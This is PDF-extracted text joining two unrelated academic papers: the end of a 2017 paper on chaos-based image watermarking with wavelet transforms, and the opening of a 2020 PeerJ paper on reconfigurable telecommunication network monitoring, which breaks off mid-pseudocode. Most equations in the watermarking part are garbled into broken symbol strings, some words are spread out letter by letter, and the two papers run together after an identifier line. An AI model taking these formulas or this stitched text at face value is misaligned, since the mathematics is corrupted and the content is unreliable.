integration time step, [x] represents integer part of variable x. Its mathematical expression is shown in the Eq.3: [( )/ ] 0 0 ( ) lim ( 1) ( ) t a h j a t h j D f t h f t jh j α α α − − → =   = − −    ∑ (3) where ( 1)...( 1) ! j j j α α α α  − − + =    Simplified Eq. 3 get Eq. 4: ( ) 0 0 ( ) m t m j m j j D y t h yα α αω− − = = ∑ (4) where ( ) ( 1) ; 0,1, 2...jj jj α αω   = − =    . According to Eq. 4, change Eq. 1 : ( ) 0 ( ) 0 ( ) 0 ( ) ( ) m j m j m m j m j m j m m m m j m j m j m m m j h x a y x h y c a x x z cy h z x y bz α α β β γ γ ω ω ω − − = − − = − − =  = −   = − − +   = −  ∑ ∑ ∑ (5) Simplified Eq. 5: 82 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 ( ) 1 ( ) 1 ( ) 1 ( ) / (1 ) ( ( ) ) / (1 ) ( ) / (1 ) m m m j m j j m m m m j m j j m m m m j m j j x ah y x ah y h c a z x y ch z h x y z bh α α α β β β γ γ γ ω ω ω − = − = − =  = − +   = − − − −   = − +  ∑ ∑ ∑ (6) where , ,m m mx y z are implied. The iterative algorithm is used to express them: ( ) ( ) ( ) ( ) ( ) ( ) ( ) ( ) 1 1( ) ( ) 1 1 1 ( ) 1 1 1 ( ) 1 ( ) / (1 ) ( ( ) ) / (1 ) ( ) / (1 ) m l ll m m j m j j m l l l m m m j m j j m l l l m m m j m j j x ah y x ah y h c a z x y ch z h x y z bh α α α β β β γ γ γ ω ω ω − − − = − − − = − − − =  = − +   = − − − −   = − +  ∑ ∑ ∑ (7) where l is iteration number . When ( ) ( 1) ( ) ( 1) ( ) ( 1), ,l l l l l lm m m m m mx x y y z zδ δ δ − − −− < − < − < ( δ i s v e r y s m a l l , s u c h a s 510δ −= ) , ( ) ( 1) ( ) ( 1) ( ) ( 1), ,l l l l l lm m m m m mx x y y z z − − −= = = .System will exhibit chaotic behavior when initial conditions are s e t a s : 0.01h = , ( ) ( ), , 0.97, 0.98, 0.99α β γ = , 35, 3, 28a b c= = = , ( ) ( )0 0 0, , 1, 3, 4x y z = . T h e projections of the attractor are shown in Fig.1. Chaotic system will produce chaotic sequence, and these sequences are used to encrypt watermark image. The result will produce a chaotic encrypted image, which will be then used for embedding the wavelet coefficients [17]. (a) x-y plane (b) y-z plane Image Watermarking Encryption Scheme Based on Fractional Order Chaotic System 83 (c) x-z plane (d) x-y-z plane Figure.1 The attractors of system described in Eq. (1) 2.2 Discrete wavelet transform In the process of image processing, the lossy compression can cause damage to the digital watermark. So the characteristics of lossy compression must be used to find the maximum robustness in the process of embedding and extracting digital watermark. The DWT is a local transformation and has the ability of multi scale analysis. By using wavelet transform, the original image sequence can be decomposed into multi frequency sub images which can adapt to the visual characteristics of the human eye, and the watermark embedding and detection can be carried out in a plurality of levels. Wavelet transform domain digital watermarking method has the advantages of both temporal and spatial domain method and DCT transform domain method. A two-dimensional image can be decomposed into different frequency components, and the image can be decomposed into 4 parts at each level of the transformation. For example, the first level of decomposition, i.e. LL1, LH1, HL1, HH1 [18]. A wide range of information is contained in the low frequency component LL1 part. LH1, HL1, HH1 are high frequency components which contain the specific details. Wavelet decomposition can continue be used to decompose LL1 to get LL2, LH2, HL2, HH2. Repeat this process until the required decomposition level is obtained, i.e. LLn, where n represents the decomposition level. These wavelet coefficients can be used in the future to restore the original image, this inverse process of DWT is known as IDWT. 3. Proposed Watermarking Algorithm This part gives a detailed introduction of the watermark embedding algorithm and extraction algorithm. The size of the original image I is M N× and the size of binary watermark image W is m n× . 3.1 Embedding watermarking The different fractional derivative orders and initial conditions for Eq.(1) are given as: ( ) ( )0 0 0 1 1 1, , , , , ,x y z x y z ( ) ( )0 0 0 1 1 1, , , , ,α β γ α β γ . The specific steps of the embedding watermarking algorithm are as follows: Step1. Perform operations on the original image according to a two level DWT, and four parts are obtained, i.e. LL2, LH2, HL2, HH2. Embedding operation is performed on this four parts. Step2. The chaotic system can produce two chaotic sequences by input the key, and the watermarking 84 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 will be scrambled and encrypted. It is defined as U. Step3. The encrypted binary watermarking is embedded into the original image according to the formula below: , 2 2( , ) ( , ) ( , )I i j I i j U i jα= + (8) where α represents visibility factor , its value is 0.05 for proposed scheme, ( , )I i j represents the second level wavelet coefficient. Embedding computing in four parts is all like this, i.e. LL2, LH2, HL2, HH2. Step4. Perform operations on each part according to a two level IDWT of , 2 ( , )I i j , the watermarked image for each part ,, 2 ( , )I i j is obtained. Step5. Combine four parts to get the watermarked image. The flow chart of embedding watermarking is shown in Fig. 2 3.2 Extracting watermarking The process of extracting watermarking is the reversed order of the embedding procedure. It can be briefly introduced as follows: Step1. Perform operations on the watermarked image according to a two level DWT and extract all the parts. Step2. Perform operations on the original image according to a two level DWT. Step3. With the help of the chaotic system, chaotic sequences will be generated. Step4. Extract wavelet coefficients of the embedded watermarking, All four parts are calculated according to the formula below: , ,, 2 2( , ) ( ( , ) ( , )) /U i j I i j I i j α= − (9) Step5. Use chaotic sequence to decrypt the encrypted watermarking Figure.2 The flowchart of embedding watermarking Generating key Obtaining the chaotic sequence Permuting watermarking Embedding watermarking by DWT Outputting the watermarked image Image Watermarking Encryption Scheme Based on Fractional Order Chaotic System 85 4. Experimental Results and Security Analysis This section presents the experimental results and security analysis of the proposed algorithm. Firstly, the experimental results are given and the embedding efficiency is calculated, and the results of the proposed scheme under various different attacks are also given. Then the test results of encryption security for proposed scheme are given, such as the grey histogram, the space of key, key sensitivity. 4.1 Experimental results Watermarking scheme usually need to satisfy some properties, such as “embedding efficiency” and “attacks”. The experimental results of these properties are as follows. 1) Experimental results In this section, the standard Lena image with 256 256× is used as host image and binary logo with 64 64× is used as watermark image. Initial conditions are set as: ( ) ( )0 0 0, , 1, 3, 4x y z = , ( ) ( )1 1 1, , 2, 7, 5x y z = , ( ) ( )0 0 0, , 0.97, 0.98, 0.99α β γ = , ( ) ( )1 1 1, , 0.97, 0.98, 0.99α β γ = . The results of watermarking embedding and extraction are obtained as shown in Fig 3. The embedding of watermarking can be seen as effective if raw data and processed data cannot be distinguished. In order to show the effect of the proposed scheme more directly, the peak signal-to- noise ratio (PSNR) was used to evaluate the image quality, the calculation formula is as follows: ( ) 2 10 255 10 logPSNR dB MSE = × (10) The mean squared error (MSE) between the original image and watermarked image can be defined as: ( ) ( ) 21 1 ,, 2 0 0 1 , , M N i j MSE I i j I i j M N − − = =  = − × ∑∑ (11) where ( , )I i j and ,,2 ( , )I i j represent the pixel values on the location ( , )i j , while the image size is M N× . In this study, the bit error rate (BER) of extracted watermarking is used to test reliability, the calculation formula is as follows: 100 B BER M N = × × (12) where B represents the number of erroneously detected bits, and the size of extracted watermark image is M N× . The PSNR value of the watermarked image is 41.33 dB, and the BER value of the extracted watermarking is zero. Therefore, there is almost no obvious perceptual distortion between original image and watermarked image; the process of embedding watermarking does not affect the quality of image. 86 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 (a)Host image (b) Watermark image (c) Watermarked image (d) Extracted watermark image Figure.3 Experimental results 2) Attacks In order to test the robustness, several different attacks are given. Common signal processing attacks include: (1) JPEG compression: JPEG is the abbreviation of Joint Photographic Experts Group, JPEG image compression algorithm can provide good compression performance, and has a good reconstruction quality, it is widely used in the field of image and video processing [19, 20]. The compression ratio of the proposed scheme is 50:1. (2) Filtering: Filtering can filter out the specific band frequency of the signal, it is an important measure to restrain and prevent interference. (3) Noise addition: The probability density function of Gaussian noise obeys Gauss distribution (i.e. normal distribution). If the amplitude distribution of a noise obeys Gauss distribution, and its power spectrum density is uniformly distributed, it is called Gaussian white noise [21, 22, 23]. The proposed scheme adds the Gaussian noise, whose mean value is 0 and the variance is 0.01. (4)Histogram equalization: Histogram equalization is a method to adjust the contrast in the field of image processing using image histogram [21, 22, 23]. (5) Contrast adjustment: Contrast of the watermarked image is improved by 50%. (6) Gamma correction: Gamma correction can edit the gamma curve of image, recognize the dark part and light part of the image signal, and increase the proportion of the image. The gamma value of the proposed theme is reduced to 0.6. The test results for watermarked image are given in Table 1. It can be clearly displayed from the Table 1 that the proposed scheme performs better. Image Watermarking Encryption Scheme Based on Fractional Order Chaotic System 87 Table 1 Comparsion result of PSNR values between proposed scheme and previous work PSNR[dB] Attacks Proposed scheme Rawat ea al[7] Gaussian Noise 19.69 13.37 Contrast Enhancement 21.51 19.008 Average Filtering 37.24 29.26 Median Filtering 32.05 31.03 Gamma Correction 17.25 15.43 Histogram Equalization 25.71 19.4 JPEG(Q=50) 39.26 34.96 4.2 Security analysis and simulation for proposed scheme 1) The grey histogram analysis The histogram reflects the basic statistical characteristics of the image. Compare the grey histograms of the original image and the watermarked image, the statistical performance is analyzed. Fig.4 shows the histograms of the original image and the watermarked image. From the figure, it is clear that two histograms are almost the same. The real information of the watermark image has been well hidden, it is not easy to use statistical characteristics to attack the watermarked image. So, the proposed algorithm can well resist statistical attack. 2) The space of key For an encryption scheme, key space should be enough large to resist brute-force attack. In proposed scheme, the initial key consists of many elements. So the key of the system can be set ( )0 0, , ,a bα γ , each key parameter is independent of each other. In practical design, a and b are impossible to be infinitely large, their range can be set 0 , 100a b< < . According to the precision of the double precision floating point of the computer, the scheme takes 8 bytes and 15 effective numbers to analyze the data. So the key space is equivalent to 14 14 15 15 5810 10 10 10 10× × × = , which is able to resist the brute-force attack. (a) The histogram of the original image (b) The histogram of the watermarked image Figure.4 The grey histograms 88 International Journal of Advanced Network Monitoring and Controls Volume 02, No.2, 2017 3) Key sensitivity A good encryption scheme needs not only a large key space, but also it must be sensitive to the key parameters. Only in this way can it be able to resist the differential attack. In the test, the key used in the scheme is (0.97, 0.99, 35, 3). In order to test the sensitivity of the algorithm to the key, some error keys are used to extract the watermark image. As can be clearly seen from Fig.5, the proposed scheme is very sensitive to the key parameters, even if a single key parameter is only 0.001 of the deviation, it will lead to a completely different extraction result. (a)Extracted watermark by the (b) Extracted watermark by the (c) Extracted watermark by the correct key: (0.97,0.99,35,3) wrong key: (0.971,0.99,35,3) wrong key: (0.97,0.99,35,3.001) Figure.5 Extraction result 5. Conclusion Through research, a new image watermarking scheme based on the fractional order Chen chaotic system and discrete wavelet transform is proposed. The fractional order Chen chaotic system is used to increase the overall complexity of the algorithm. Chaotic system is used to deal with the digital watermarking, and the watermarking information is embedded into the original image which is processed by discrete wavelet transform. By analyzing and comparing the experimental results show that the proposed watermarking scheme has high security and stronger robustness and invisibility. All these characteristics demonstrate that the proposed scheme is in favor of image watermarking encryption. Acknowledgment This work was supported by National Nature Science Foundation of China (No: 61201227). References [1] S. Poonkuntran, R.S. Rajesh. “Chaotic model based semi fragile watermarking using integer transforms for digital fundus image authentication”, Multimedia Tools & Applications, vol. 68, no.1,pp. 79-93, 2014. [2] X.J.Tong, Y.Liu, M.Zhang, et al. “A novel chaos-based fragile watermarking for image tampering detection and self-recovery”, Signal Process Image Commun, vol. 28, no.3,pp. 301-308, 2013. [3] S.Behnia, M.Teshnehlab, P.Ayubi. “Multiple-watermarking scheme based on improved chaotic maps”, Communications in Nonlinear Science & Numerical Simulation, vol. 15, no.9,pp. 2469-2478,2010. [4] T.G.Gao, Q.L.Gu, S.Emmanuel. “A novel image authentication scheme based on hyper-chaotic cell neural network”, Chaos Solitons&Fractals, vol. 42, no.1,pp. 548-553, 2009. [5] A.Mooney, J.G.Keating, I.Pitas. “A comparative study of chaotic and white noise signals in digital watermarking”, Chaos Solitons&Fractals, vol. 35, no.5,pp. 913-921,2008. [6] G.Y.Gao, G.P.Jiang. “Zero-bit watermarking resisting geometric attacks based on composite-chaos optimized SVR model”, The Journal of China Universities of Posts and Telecommunications, vol. 18, no.2,pp. 94-101,2011. Image Watermarking Encryption Scheme Based on Fractional Order Chaotic System 89 [7] S.Rawat, B.Raman. “A publicly verifiable lossless watermarking scheme for copyright protection and ownership assertion”, AEU-International Journal of Electronics and Communications, vol. 66 ,no.11,pp. 955- 962,2012. [8] M.R.Keyvanpour, F.M.Bayat. “Blind image watermarking method based on chaotic key and dynamic coefficient quantization in the DWT domain”, Mathematical&Computer Modelling, vol. 58,pp. 56-67,2013. [9] D.Y.Zhao, J.P.Chen, J.C.Sun. “Design and implementation of improved watermarking system in WT domain”, The Journal of China Universities of Posts and Telecommunications, vol. 14,no.2,pp. 58-63,2007. [10] M.Barni, F.Bartolini, A.Piva. “Improved wavelet-based watermarking through pixel-wise masking”, IEEE Transactions on Image Processing A Publication of the IEEE Signal Processing Society, vol. 10,no.5,pp. 783- 791,2001. [11] B.Y.Lei, D.Ni, S.P.Chen, et al. “Optimal image watermarking scheme based on chaotic map and quaternion wavelet transform”, Nonlinear Dynamics, vol. 78,no.4,pp. 2897-2907,2014. [12] O.Benrhouma, H.Hermassi, S.Belghith. “Tamper detection and self-recovery scheme by DWT watermarking”, Nonlinear Dynamics, vol. 79,no.3,pp. 1-17,2014. [13] J.Song, Z.Zhang. “A Digital Watermark Method Based on SVD in Wavelet Domain”, International Journal of Advancements in Computing Technology, vol. 3,no.8,pp. 205-214,2011. [14] G.P.Tang, X.F.Liao, Y.Chen. “A novel method for designing S-boxes based on chaotic maps”, Chaos Solitons&Fractals, vol. 23,no.2,pp. 413-419,2005. [15] C.P.Li, G.J.Peng. “Chaos in Chen’s system with a fractional order”, Chaos Solitons&Fractals, vol.22,no.2,pp. 443-450,2004. [16] S.M.Kenneth, R.Bertram. “An introduction to the fractional calculus and fractional differential equations”, Wiley-Interscience, vol. 65,no.9,pp. 1000-1003,1993. [17] J.H.Song, J.W.Song, Y.H.Bao. “A Blind Digital Watermark Method Based on SVD and Chaos”, Procedia Engineering, vol. 29,no.29,pp. 285-289,2012. [18] T.H.Chen, G.B.Horng, W.B.Lee. “A publicly verifiable copyright-proving scheme resistant to malicious attacks”, IEEE Transactions on Industrial Electronics, vol. 52,no.1,pp. 327-334,2005. [19] W.B.Pennebaker, J.L.Mitchell. JPEG Still Image Data Compression Standard, New York: Van Nostrand Reinhold, 1993. [20] T.Acharya, P.S.Tsai. JPEG2000 Standard for Image Compression: Concepts, Algorithms and VLSI Architectures,New York: John Wiley & Sons, 2004. [21] R.C.Gonzalez, R.E.Woods. Digital Image Processing, New York: Addison-Wesley Longman Publishing Co., Inc., 2001. [22] W.K.Pratt. Digital Image Processing,New York: Wiley & Sons, 1991. [23] A.Rosenfeld A, A.C.Kak. Digital Picture Processing,Cambridge, Massachusetts: Academic Press,1982. Author Brief and Sponsors: Dawei Ding, he is an associate professor with School of Electronics and Information Engineering at Anhui University, Hefei, China. His research area include communications networks, the nonlinear circuit network, the network congestion control, non- linear dynamics and chaos, bifurcation, etc.. work_5w5ug7v47bhlhiu6ds5mrfzzfi ---- Submitted 22 January 2020 Accepted 11 July 2020 Published 10 August 2020 Corresponding author Man Tianxing, mantx626@gmail.com Academic editor Shlomi Dolev Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.288 Copyright 2020 Tianxing et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Reconfigurable monitoring for telecommunication networks Man Tianxing1, Vasiliy Yurievich Osipov2, Alexander Ivanovich Vodyaho3, Andrey Kalmatskiy4, Natalia Alexandrovna Zhukova2, Sergey Vyacheslavovich Lebedev3 and Yulia Alexandrovna Shichkina3 1 ITMO University, Saint Petersburg, Saint Petersburg, Russia 2 Saint-Petersburg Institute for Informatics and Automation of the Russian Academy of Sciences, Saint Petersburg, Saint Petersburg, Russia 3 St. Petersburg State Electrotechnical University, Saint Petersburg, Saint Petersburg, Russia 4 Google, New York, NY, United States of America ABSTRACT This article addresses the monitoring problem of the telecommunication networks. We consider these networks as multilevel dynamic objects. It shows that reconfigurable systems are necessary for their monitoring process in real life. We implement the reconfiguration abilities of the systems through the synthesis of monitoring programs and their execution in the monitoring systems and on the end-user devices. This article presents a new method for the synthesis of monitoring programs and develops a new language to describe the monitoring programs. The programs are translated into binary format and executed by the virtual machines installed on the elements of the networks. We present an example of the program synthesis for real distributed networks monitoring at last. Subjects Adaptive and Self-Organizing Systems, Agents and Multi-Agent Systems, Computer Networks and Communications Keywords Monitoring system, Complex object model, Abstract machine, Telecommunication network INTRODUCTION Nowadays, the success of human activity in many areas largely depends on the efficiency of the functioning of telecommunication networks. Telecommunications networks today are used in a variety of fields of human activity. Thus, the use of radar and radar-optical data to solve a massive class of problems in the field of transport, agriculture, classification of area and point objects, monitoring of anthropogenic activities, and other tasks seem to be extremely promising. At least a dozen of new radar satellites are planned to be launched in the coming years, all cars today are equipped with radar. The intelligent processing of this data requires the use of edge and cloud computing, which entails the new challenges to the telecommunication network design. Damage or incorrect operation of such networks can be a reason for severe losses. So, it is necessary to have adequate tools and methods for maintaining such networks. It can be done through permanent monitoring. Monitoring ensures safety operation, quick detection, and prevention of network failures. Many factors cause changes in the structure, the state, and the behavior of the networks. Thus, there is a need to reconfigure monitoring How to cite this article Tianxing M, Osipov VY, Vodyaho AI, Kalmatskiy A, Zhukova NA, Lebedev SV, Shichkina YA. 2020. Reconfig- urable monitoring for telecommunication networks. PeerJ Comput. Sci. 6:e288 http://doi.org/10.7717/peerj-cs.288 https://peerj.com/computer-science mailto:mantx626@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.288 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.288 processes. Reconfigurable monitoring processes should allow us to gather the data about dynamic telecommunication networks and process them according to the current state of these networks and estimations of their expected use. In the telecommunication networks, objects of monitoring are multiple technical devices of end-users. Sets of parameters characterize the state of the objects and their elements. Centralized and decentralized schemes for object monitoring are used. Centralized schemes assume that monitoring systems gather data from objects. Also, data can be gathered by the objects and transferred to the monitoring systems. In both schemes, predefined processes are commonly used. Gathering all possible data leads to a significant increase in network traffic. When data is partially collected, it does not allow quickly to detect failures of the objects, identify their reasons. For the reconfiguration of monitoring processes, business rules can be used. The rules define processes behavior for different known situations. This approach is well applicable for monitoring when networks have permanent structures and permanent conditions of use. The problem of monitoring of dynamic networks remains unsolved. To solve the problem monitoring systems must have abilities to build and rebuild the monitoring processes dynamically. In the article, we propose a new method for building monitoring processes based on using the theory of synthesis. To execute the processes a new language and a new virtual machine (VM) are developed. The rest of the article is structured as follows. In the second section, the capabilities of the existing monitoring systems are analyzed. It is shown that for dynamic telecommunication networks reconfigurable systems have not been considered until now. Then we describe monitoring processes and propose new models for monitoring programs and the method for their synthesis that allow develop reconfigurable monitoring systems. In the fourth section we present the implementation of the proposed method, which contains the description of the language for monitoring programs, a compiler for the language, and a virtual machine that is capable of executing the compiled monitoring programs on end-user devices. In the fifth section, a case study is given to prove the effectiveness of the method. The last section is the conclusion. MATERIALS & METHODS Related work Today monitoring systems are used almost in all subject areas –medical (Baig et al., 2017; Mukhopadhyay, 2014; Sohn et al., 2003; Yang et al., 2016; Shichkina et al., 2019), environment (Gaikwad & Mistry, 2015; Kumar, Kim & Hancke, 2012), social network (Chakravarthi, Tiwari & Handa, 2015), energy (Eissa, Elmesalawy & Hadhoud, 2015), production (Singh, Gernaey & Gani, 2010), urban, economy (Bello et al., 2018; Sakhardande, Hanagal & Kulkarni, 2016), agriculture (Suma et al., 2017), transport (Shichkina et al., 2019), fishery (Raju & Varma, 2017), etc. For many subject areas, including telecommunication, monitoring systems are playing a critical role. In traditional monitoring systems (Zabbix, http://www.zabbix.com/), (Nagios, http://www.nagios.org/), (Zenoss, http://www.zenoss.Org/), (Pandora FMS https: Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 2/21 https://peerj.com http://www.zabbix.com/ http://www.nagios.org/ http://www.zenoss.Org/ https://pandorafms.com/ https://pandorafms.com/ http://dx.doi.org/10.7717/peerj-cs.288 //pandorafms.com/), (Icinga https://icinga.com/), (Sensu http://sensu.io/), (GroundWork Monitor https://www.gwos.com/), data is collected and then transmitted to monitoring systems in the form of the data streams. The data is processed by monitoring systems which have a distributed tree structure. Each element can collect and process data from multiple objects. The higher-level elements aggregate the data processing results of the lower-level elements. The tree structure allows the monitoring systems to have a sufficiently high level of performance. If the observed object changes and data is generated, redesign of the monitoring systems is a necessary process. Systems redesign assumes active involvement of software architects and programmers. In the past few years, the monitoring systems have evolved significantly. Developed monitoring systems are based on the integration of multiple modern technologies (Morgan & O’Donnell, 2018). In particular, in these systems, data is collected using Internet of Things technologies (Maksymyuk et al., 2017; Myint, Gopal & Aung, 2017; Raju & Varma, 2017; Sakhardande, Hanagal & Kulkarni, 2016; Suma et al., 2017; Yang et al., 2016). Data processing employs statistical methods, data mining algorithms, and machine learning algorithms (Ge, Song & Gao, 2013). These monitoring systems are a type of adaptive systems. They assume changes in both data gathering processes and processes of data processing. Adaptive systems use flexible data processing models (Cabal-Yepez et al., 2012; Dovžan, Logar & Škrjanc, 2014) or business rules (Al Mamun et al., 2016; Koetter & Kochanowski, 2015) to build and rebuild processes. The likelihood of their ability to adapt in different cases depends on the composition of the selected business rules and the defined values of customizable parameters of the processing models (Singh, Gernaey & Gani, 2010). The reconfigurable monitoring systems have advanced capabilities for adaptive data gathering and processing. The features of reconfigurable systems are discussed in (Korableva, Kalimullina & Kurbanova, 2017; Lyke et al., 2015). In monitoring systems, reconfiguration operations can be considered at several levels: sensor level, embedded system level, and application level. At the sensor level, reconfiguration problems are solved by developing new programmable sensors (Myint, Gopal & Aung, 2017). The new programs are uploaded for updating the logic of the sensors. For the adaptation of the embedded monitoring systems, they equip with reconfigurable data preprocessing modules (Cabal-Yepez et al., 2012). At the application level, the adaptability is achieved through customizable interfaces (Fu, 2012), usage of genetic algorithms (Thompson, 2012), and so on. It is also possible to synthesize new configurations for the systems and their components at the level of field-programmable gate arrays (Cong et al., 2011; Cong & Minkovich, 2007; Lysecky, Vahid & Tan, 2004; Rubin & DeHon, 2011). For implementing reconfigurable systems, several methods have been proposed. In (Morgan & O’Donell, 2014), service-oriented architectures of reconfigurable systems are presented. The problems of message routing and service orchestration in such systems are discussed. Technological solutions for building reconfigurable systems are given in (Silva, Marques & Lopes, 2018). One of the limitations of the existing systems is that they cannot reconfigure themselves dynamically. For dynamic reconfiguration, they have to be able to synthesize programs Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 3/21 https://pandorafms.com/ https://pandorafms.com/ https://peerj.com https://pandorafms.com/ https://icinga.com/ http://sensu.io/ https://www.gwos.com/ http://dx.doi.org/10.7717/peerj-cs.288 for data gathering and data processing and execute them. Some of the processes should be performed in the monitoring systems and some of the end-user devices. To date, only a few dynamically reconfigurable systems exist. One of such systems has been developed for monitoring the status and performance of a supercomputer network (Stefanov et al., 2015). The monitoring system is considered as a set of subsystems. The subsystems process data about the performance of one or more tasks. Performance metrics are calculated on the fly. To this purpose, a program module is dynamically created for each process that is performed to solve the general task, and the transmission paths for the calculated metrics are dynamically determined. The module oriented architecture of the systems and their ability to create the modules dynamically make them able to adapt to new data sources and new processing methods. When creating a new module, the nodes on which it will be executed are selected based on the current load on the computer network. As a result, a balanced load of the nodes is ensured. The nodes of the system can process a part of the data about the state of the network. With these additional resources for solving the monitoring problems are obtained. The results of using these monitoring systems have shown that they allow solving the tasks of monitoring of supercomputer networks.Reconfigurable systems and dynamically reconfigurable systems have not yet been developed in the field of telecommunications. MULTILEVEL SYNTHESIS OF MONITORING PROGRAMS Monitoring objects, processes, and programs in telecommunication networks Telecommunication networks have a multilevel structure. The elements of the higher levels are groups of objects. Within the lower levels, separate objects are considered. These objects are end-user devices. The components and the subcomponents inside characterize them. There are multiple links between the elements at all levels. Monitoring processes are oriented on providing data about the state of the end-users’ devices to the customer service. These devices can gather data about their state and process it. Monitoring systems can interact with the devices. Within the interaction, data can be received from the devices, and commands on data gathering and data processing can be sent to them. The devices can perceive both separate commands and programs that contain multiple commands. Monitoring programs are built and rebuild by monitoring systems. New programs are built-in multiple cases, such as changes in the structure, state, or behavior of the devices or definitions of new requirements to the results of the monitoring. Requirements can refer to both the output data about the state of the network and the conditions of the monitoring, for example, admissible time modeling, accuracy and reliability of the models, consumed technical resources, etc. There are two primary sources of data about the state of the devices. They are the messengers that are sent from the devices and the log files that they produce. The log files are sequences of records that describe events registered by the devices. Related data on factors affecting the network operation can be received from other sources. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 Figure 1 The structure of the monitoring process. Full-size DOI: 10.7717/peerjcs.288/fig-1 The operators of the customer service define the requirements for the results of the monitoring. Figure 1 represents the structure of the monitoring process. According to Fig. 1, monitoring processes assume gathering data about the target objects (end-user devices). Current models of target objects are built using gathered data. These models reflect the state of the objects based on available data. Current models are compared with the required models. They are defined according to the requirements of the end-users (operators of customer service). Usually, these two models do not match. Current models can have many undefined parameters in comparison with the required models. If the models do not match, then new monitoring programs are synthesized. Possible ways of transitions between current and required models are considered to synthesize new programs. Each transition determines additional elements of data that are needed to reach the target model. Thus, after constructing sequences of transitions, it becomes known what data should be gathered. New monitoring programs contain sequences of commands that allow gathering required data elements. The formally monitoring process PR can be defined as PR :O′→O′′ where O′ is the model that reflects the state of the objects in the network. The model O′ is the current model that is build using gathered data. The model O′′ is the model that is required by the user. The monitoring processes are targeted at building current models that match the required models. The synthesis of monitoring programs is an essential part of the monitoring processes. Synthesized programs are defined as the complement of O′′concerning O′: PRG=O′′\O′={e∈O′′|e 6∈O′}. The synthesis of the monitoring programs is ensured through the following: • The networks are commonly described in discrete time and discrete space. Thus automata are used as the models of the networks. Automata describe the states of the networks. Since there are too many possible states, some of them can be unknown, it is not possible to describe all the states of the automata apriori. Due to that relatively finite Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 5/21 https://peerj.com https://doi.org/10.7717/peerjcs.288/fig-1 http://dx.doi.org/10.7717/peerj-cs.288 automata are used (Osipov, 2016). They are finite only for one moment of time. At each time step, all the parameters of the automata can be redefined. • Traditional methods of synthesis have high computational complexity. The complexity can be reduced if we take into account the multilevel structure of the networks. To synthesize models of objects with multilevel structure multilevel methods of synthesis can be used. Compared to single-level methods, they allow increase the speed of the synthesis of the required programs in times. It is achieved due to the fact that the number of the elements in the models at upper levels is small in relation to the lower levels. • The synthesized programs can be described using a new language. It is oriented on describing the programs for monitoring of telecommunication networks. The programs that are written using this language can be compiled and executed on end-user devices. Automata models for programs synthesis The models of the objects are multilevel structures that represent the objects as multiple sets of parameters. Sets of parameters and separate parameters are linked within separate levels and between the levels. We suggest using multilevel automata models to synthesize the programs of monitoring for the objects that assume gathering information at different levels. The model of the automata at one level can be defined in the following way (Osipov, 2016; Osipov et al., 2017): < AI, AO, AS, AR>, where AI - a set of admissible input data, AO - a set of admissible output data, AS - a set of admissible internal states, AR - an admissible set of transition functions between the elements of the set of input data and the elements of the set of output data. So, the entire multilevel model is < < AI0, AO0, AS0, AR0> ; < AI1, AO1, AS1, AR1> ; ..... < AI N, AON, ASN, AR N> >, where the super index defines the level of the automata model. At each step of program synthesis, automata can be in one of the admissible states. Within each step, the sets of admissible states and transition functions are rebuilt, taking into account the achieved state and the conditions of synthesis. Thus the automata at step r is defined as: < Ir, Or, Sr, Fr, AIr−1, AOr−1, ASr−1, ARr−1> , where I - input data, O - output data, S - internal state, F - transition functions (conditions). Parameters I, O, S, R are defined for the step r and parameters AI, AO, AS, AR - for the step r-1. Method of synthesis of monitoring programs The method allows synthesizing programs for objects monitoring in conditions when the current and the target models of the objects are defined. It is required to gather data about the objects that are necessary to move towards required models from current models. The method uses direct and backward inference. The direct inference is used to prove that the transition between models is possible and that the target model exists. As a result of the direct proof, multiple sequences of transitions can be defined. The backward inference allows restoring programs from the results of the proof. The inference is carried out according to the scheme mirrored to direct inference. Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 6/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 In the conditions, when the existence of the target models cannot be proved, the possibilities of changing the models can be considered. In the automata model for program synthesis, the set of input data elements {ds} are defined according to the current model of the object, the set of output data elements {dw} are elements of the target model of the object. Transition functions Fzv reflect links between elements of the models: Fzv(dzve) -> (dzva), where e = [1, Ez] indicates elements of the models that are required to achieve an element indicated as dzva. Method for building sequences of transitions between object models based on direct inference Below the description of the method is given: Input data. {ds} - the sets of the input data elements; {dw} - the sets of the output data elements; Fzv - transition functions between the elements. Output data. TransitionSequence - sequences of transitions that allow reach elements {dw} of the target model having elements {ds} of the current model. The pseudo code of the method is the following: Function FindAchievableElements(maxLevel, M, CurrentM, TargetM) is 1. for each l in [maxLevel..0] do 2. for each i in [0..M.funConditions[l].length] do 3. if checkCondition(M.funConditions[l][i]) == true do 4. elementPairs = cartesianProduct(CurrentM.Elements[l], TargetM.Elements[l]) 5. for each j in [0..elementPairs.length] 6. if profTransition(M.vzLinkingFun[l][i](elementPairs[j].first, elementPairs[j].second)=true do 7. M.AchievedFrom[l] = add(M.AchievedFrom[l], elementPairs[j].first) 8. M.AchievedTo[l] = add(M.AchievedTo[l], elementPairs[j].first) 9. M.AchievedWith[l] = add(M.AchievedWith[l], M.vzLinkingFun[l][i]) 10. M.AchivedWhile[l] = add(M.AchivedWhile[l], checkCondition[l][i]) 11. remove(M.NonProven[l+1], elementPairs[j].second) 12. else 13. M.NonProven[l]= add(M.NonProven[l], elementPairs[j].second) 14. end 15. if M.NonProven[l].length != 0 && maxLevel != 0 do 16. FindAchievableElements(maxLevel-1, M, CurrentM, TargetM) 17. end 18. return M Tianxing et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.288 7/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.288 Function DirectProgramSynthesis(maxLevel, M, CurrentM, TargetM) is 1. M = 